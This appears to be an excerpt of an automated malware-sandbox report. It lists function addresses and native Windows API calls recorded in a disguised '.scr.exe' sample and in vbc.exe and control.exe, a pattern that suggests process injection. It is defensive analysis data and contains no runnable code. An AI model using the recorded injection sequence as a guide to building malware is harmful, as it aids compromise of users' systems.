                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612E80 NtReadVirtualMemory,4_2_05612E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612BE0 NtQueryValueKey,4_2_05612BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612BF0 NtAllocateVirtualMemory,4_2_05612BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612BA0 NtEnumerateValueKey,4_2_05612BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612B80 NtQueryInformationFile,4_2_05612B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612AF0 NtWriteFile,4_2_05612AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612AD0 NtReadFile,4_2_05612AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612AB0 NtWaitForSingleObject,4_2_05612AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05613010 NtOpenDirectoryObject,4_2_05613010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05613090 NtSetValueKey,4_2_05613090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05613D70 NtOpenThread,4_2_05613D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05613D10 NtOpenProcessToken,4_2_05613D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056139B0 NtGetContextThread,4_2_056139B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD35C0 NtCreateMutant,LdrInitializeThunk,6_2_04BD35C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD4650 NtSuspendThread,LdrInitializeThunk,6_2_04BD4650
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD4340 NtSetContextThread,LdrInitializeThunk,6_2_04BD4340
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04BD2CA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04BD2C70
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2C60 NtCreateKey,LdrInitializeThunk,6_2_04BD2C60
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04BD2DF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04BD2DD0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04BD2D30
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04BD2D10
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04BD2E80
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04BD2EE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2FB0 NtResumeThread,LdrInitializeThunk,6_2_04BD2FB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2FE0 NtCreateFile,LdrInitializeThunk,6_2_04BD2FE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2F30 NtCreateSection,LdrInitializeThunk,6_2_04BD2F30
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD39B0 NtGetContextThread,LdrInitializeThunk,6_2_04BD39B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2AF0 NtWriteFile,LdrInitializeThunk,6_2_04BD2AF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2AD0 NtReadFile,LdrInitializeThunk,6_2_04BD2AD0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04BD2BA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04BD2BF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04BD2BE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2B60 NtClose,LdrInitializeThunk,6_2_04BD2B60
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD3090 NtSetValueKey,6_2_04BD3090
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD3010 NtOpenDirectoryObject,6_2_04BD3010
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2CF0 NtOpenProcess,6_2_04BD2CF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2CC0 NtQueryVirtualMemory,6_2_04BD2CC0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2C00 NtQueryInformationProcess,6_2_04BD2C00
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2DB0 NtEnumerateKey,6_2_04BD2DB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD3D10 NtOpenProcessToken,6_2_04BD3D10
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2D00 NtSetInformationFile,6_2_04BD2D00
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD3D70 NtOpenThread,6_2_04BD3D70
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2EA0 NtAdjustPrivilegesToken,6_2_04BD2EA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2E30 NtWriteVirtualMemory,6_2_04BD2E30
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2FA0 NtQuerySection,6_2_04BD2FA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2F90 NtProtectVirtualMemory,6_2_04BD2F90
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2F60 NtCreateProcessEx,6_2_04BD2F60
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2AB0 NtWaitForSingleObject,6_2_04BD2AB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD2B80 NtQueryInformationFile,6_2_04BD2B80
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C79080 NtAllocateVirtualMemory,6_2_00C79080
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C78BF0 NtCreateFile,6_2_00C78BF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C78D60 NtReadFile,6_2_00C78D60
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C78E60 NtDeleteFile,6_2_00C78E60
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C78F10 NtClose,6_2_00C78F10
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6F19C NtQueryInformationProcess,6_2_04A6F19C
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_0185D9C40_2_0185D9C4
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01A706900_2_01A70690
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01A779600_2_01A77960
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01A706800_2_01A70680
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01A779500_2_01A77950
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01ABC3000_2_01ABC300
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01ABC2F20_2_01ABC2F2
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01AB94800_2_01AB9480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004180F34_2_004180F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004010004_2_00401000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040292E4_2_0040292E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004029304_2_00402930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040F98A4_2_0040F98A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040F9934_2_0040F993
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004162D04_2_004162D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004162D34_2_004162D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040228B4_2_0040228B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004022904_2_00402290
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040FBB34_2_0040FBB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040DC334_2_0040DC33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004025904_2_00402590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0042E6134_2_0042E613
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00402E204_2_00402E20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E05354_2_055E0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A05914_2_056A0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056924464_2_05692446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056844204_2_05684420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568E4F64_2_0568E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E07704_2_055E0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056047504_2_05604750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DC7C04_2_055DC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FC6E04_2_055FC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056681584_2_05668158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D01004_2_055D0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A1184_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056981CC4_2_056981CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A01AA4_2_056A01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056941A24_2_056941A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056720004_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569A3524_2_0569A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A03E64_2_056A03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE3F04_2_055EE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056802744_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056602C04_2_056602C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EAD004_2_055EAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567CD1F4_2_0567CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DADE04_2_055DADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F8DBF4_2_055F8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0C004_2_055E0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D0CF24_2_055D0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB54_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654F404_2_05654F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05622F284_2_05622F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05600F304_2_05600F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05682F304_2_05682F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2FC84_2_055D2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565EFA04_2_0565EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0E594_2_055E0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569EE264_2_0569EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569EEDB4_2_0569EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F2E904_2_055F2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569CE934_2_0569CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F69624_2_055F6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056AA9A64_2_056AA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E29A04_2_055E29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E28404_2_055E2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EA8404_2_055EA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E8F04_2_0560E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C68B84_2_055C68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569AB404_2_0569AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05696BD74_2_05696BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DEA804_2_055DEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056975714_2_05697571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A95C34_2_056A95C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567D5B04_2_0567D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D14604_2_055D1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569F43F4_2_0569F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569F7B04_2_0569F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056256304_2_05625630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056916CC4_2_056916CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056AB16B4_2_056AB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0561516C4_2_0561516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CF1724_2_055CF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EB1B04_2_055EB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056970E94_2_056970E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569F0E04_2_0569F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E70C04_2_055E70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568F0CC4_2_0568F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CD34C4_2_055CD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569132D4_2_0569132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562739A4_2_0562739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056812ED4_2_056812ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FB2C04_2_055FB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FD2F04_2_055FD2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E52A04_2_055E52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05697D734_2_05697D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E3D404_2_055E3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05691D5A4_2_05691D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FFDC04_2_055FFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05659C324_2_05659C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569FCF24_2_0569FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569FF094_2_0569FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A3FD24_2_055A3FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A3FD54_2_055A3FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E1F924_2_055E1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569FFB14_2_0569FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E9EB04_2_055E9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E99504_2_055E9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FB9504_2_055FB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056759104_2_05675910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564D8004_2_0564D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E38E04_2_055E38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569FB764_2_0569FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05655BF04_2_05655BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0561DBF94_2_0561DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FFB804_2_055FFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05653A6C4_2_05653A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569FA494_2_0569FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05697A464_2_05697A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568DAC64_2_0568DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05625AA04_2_05625AA0
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C1D9ED5_2_03C1D9ED
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03BFD00D5_2_03BFD00D
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03BFEF8D5_2_03BFEF8D
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C056AA5_2_03C056AA
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C056AD5_2_03C056AD
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03BFED6D5_2_03BFED6D
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03BFED645_2_03BFED64
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C074C45_2_03C074C4
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C4E4F66_2_04C4E4F6
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C524466_2_04C52446
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B914606_2_04B91460
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5F43F6_2_04C5F43F
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C605916_2_04C60591
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C3D5B06_2_04C3D5B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA05356_2_04BA0535
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C575716_2_04C57571
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C516CC6_2_04C516CC
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BBC6E06_2_04BBC6E0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5F7B06_2_04C5F7B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B9C7C06_2_04B9C7C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA07706_2_04BA0770
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BC47506_2_04BC4750
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C4F0CC6_2_04C4F0CC
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5F0E06_2_04C5F0E0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C570E96_2_04C570E9
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA70C06_2_04BA70C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C581CC6_2_04C581CC
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BAB1B06_2_04BAB1B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C601AA6_2_04C601AA
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C6B16B6_2_04C6B16B
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B901006_2_04B90100
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B8F1726_2_04B8F172
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BD516C6_2_04BD516C
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C3A1186_2_04C3A118
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA52A06_2_04BA52A0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C412ED6_2_04C412ED
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BBD2F06_2_04BBD2F0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BBB2C06_2_04BBB2C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C402746_2_04C40274
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C603E66_2_04C603E6
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BE739A6_2_04BE739A
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BAE3F06_2_04BAE3F0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5A3526_2_04C5A352
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5132D6_2_04C5132D
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B8D34C6_2_04B8D34C
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5FCF26_2_04C5FCF2
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B90CF26_2_04B90CF2
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C40CB56_2_04C40CB5
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA0C006_2_04BA0C00
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C19C326_2_04C19C32
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BB8DBF6_2_04BB8DBF
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B9ADE06_2_04B9ADE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BBFDC06_2_04BBFDC0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C51D5A6_2_04C51D5A
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C57D736_2_04C57D73
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BAAD006_2_04BAAD00
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA3D406_2_04BA3D40
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA9EB06_2_04BA9EB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5EEDB6_2_04C5EEDB
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BB2E906_2_04BB2E90
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5CE936_2_04C5CE93
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5EE266_2_04C5EE26
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA0E596_2_04BA0E59
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BA1F926_2_04BA1F92
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B92FC86_2_04B92FC8
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5FFB16_2_04C5FFB1
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C14F406_2_04C14F40
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BC0F306_2_04BC0F30
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04BE2F286_2_04BE2F28
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04C5FF096_2_04C5FF09
